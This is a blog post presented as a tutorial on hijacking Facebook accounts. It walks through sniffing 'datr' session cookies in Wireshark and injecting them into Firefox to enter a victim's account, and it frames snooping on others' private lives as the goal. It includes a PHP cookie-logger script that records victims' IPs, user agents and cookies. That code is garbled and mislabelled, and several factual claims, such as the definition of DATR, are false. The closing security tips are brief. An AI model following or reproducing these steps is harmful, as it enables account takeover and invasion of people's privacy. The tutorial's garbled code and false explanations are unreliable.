How your Facebook Account can be Hacked Using Cookie Stealing

Hacking Facebook account is like what all we only need. Isn’t it? Yes, there may be some ways your Facebook accounts can be hacked easily using Linux modules and commands. And there exist some other methods like Phishing, Keylogging, DNS Spoofing, Cookie Stealing etc. We would all like to have a look to others personal happenings.And this is what we do. 🙂

And this is what we do. 🙂

So, we really need to take care of that there are many hackers who awaits for us to become vulnerable.

The method which Hackers mostly use is Phishing but here we are going to demonstrate how they can hack your Facebook accounts using Cookie Stealing.

What is a Cookie?

A Cookie is a small piece of a text file that contains information about our browsing data. A cookie works by sending as a header by we server to client server. It can be easily deleted by setting an expiring time by the user.

If you want to understand what actually cookie do, then let’s have an example. Suppose, you are visiting a website and after some days you again visit that site. But without clearing your history and browsing data, it’s load speed is faster than before.

It is because your browsing data is still stored inside that cookie text file. And some websites(almost all) uses the cookie to ensure the performance of browsing experience.

Hack Facebook Accounts Using Cookie Stealing & Session Hi-Jacking

The cookie which Facebook uses for its security is called “DATR“. DATR is a language for lexical knowledge representation and encoded within a network of nodes. Now, if an attacker got the cookie, he/she can easily hack into the Facebook account.

Look at the image below, how the Facebook Authentication Cookie looks like:


  • Network monitoring tool(Packet Sniffers), Wireshark, Commview etc. We are using Wireshark here. Click here to download it.
  • VPN, it’s a great idea to get into networking hi-jacking.
  • Some Patience.

NOTE: It is just a tutorial showing How Your Facebook Accounts Can Be Hacked Using Cookie Stealing and Session Hi-Jacking. Just for educational purpose, and do not promote any privacy. We haven’t provided with any image here because of the privacy purposes.

  • Open Wireshark, click on the play icon to start to analyze and then click on interfaces.
  • Choose any interface shown to you as per your choice and click start.
  • Let it Sniff the packets around 10 minutes and stop it after that.
  • Now, set the filter to “http.cookie contains “datr”” from the left top corner. It will search for all the HTTP cookies with the name “DATR” as we already know the Facebook Authentication Cookie.
  • Right click on it and go to “Copy – Bytes – Printable Text only“.
  • Here, you will be needed two add-ons, Greasemonkey and CookieInjector UserScript. The script looks like:


function GetIP()
if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))
$ip = getenv(“HTTP_CLIENT_IP”);
else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
$ip = getenv(“HTTP_X_FORWARDED_FOR”);
else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))
$ip = getenv(“REMOTE_ADDR”);
else if (isset($_SERVER[‘REMOTE_ADDR’]) && $_SERVER[‘REMOTE_ADDR’] && strcasecmp($_SERVER[‘REMOTE_ADDR’], “unknown”))
$ip = “unknown”;

function logData()
$cookie = $_SERVER[‘QUERY_STRING’];
$register_globals = (bool) ini_get(‘register_gobals’);
if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
else $ip = GetIP();

$rem_port = $_SERVER[‘REMOTE_PORT’];
$user_agent = $_SERVER[‘HTTP_USER_AGENT’];
$rqst_method = $_SERVER[‘METHOD’];
$rem_host = $_SERVER[‘REMOTE_HOST’];
$referer = $_SERVER[‘HTTP_REFERER’];
$date=date (“l dS of F Y h:i:s A”);
$log=fopen(“$ipLog”, “a+”);

if (preg_match(“/\bhtm\b/i”, $ipLog) || preg_match(“/\bhtml\b/i”, $ipLog))
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n”);



  • You also need Mozilla Firefox, because these are Firefox add-ons. You might be having that also.
  • Press “Alt+C” to bring up the CookieInjector. Simply paste in the cookie value into it.
  • Refresh the page, you are inside the victim’s Facebook Account. 🙂
How To Secure Your Facebook Account From Being Hacked
  • Nowadays, there are more secure networks so use them. Don’t use HTTP version of any Social Media and now they have the secured HTTPS connections. They have already redirected to HTTPS.
  • Always clear the Cookie from your browser and avoid saving the passwords in the browsers.
  • Be aware. 😉

Read: How To Block Websites Using Hosts File

So, it’s all about Cookie Stealing and Session Hijacking.

If you find it helpful, help others and share it as more as you can!

Post Comment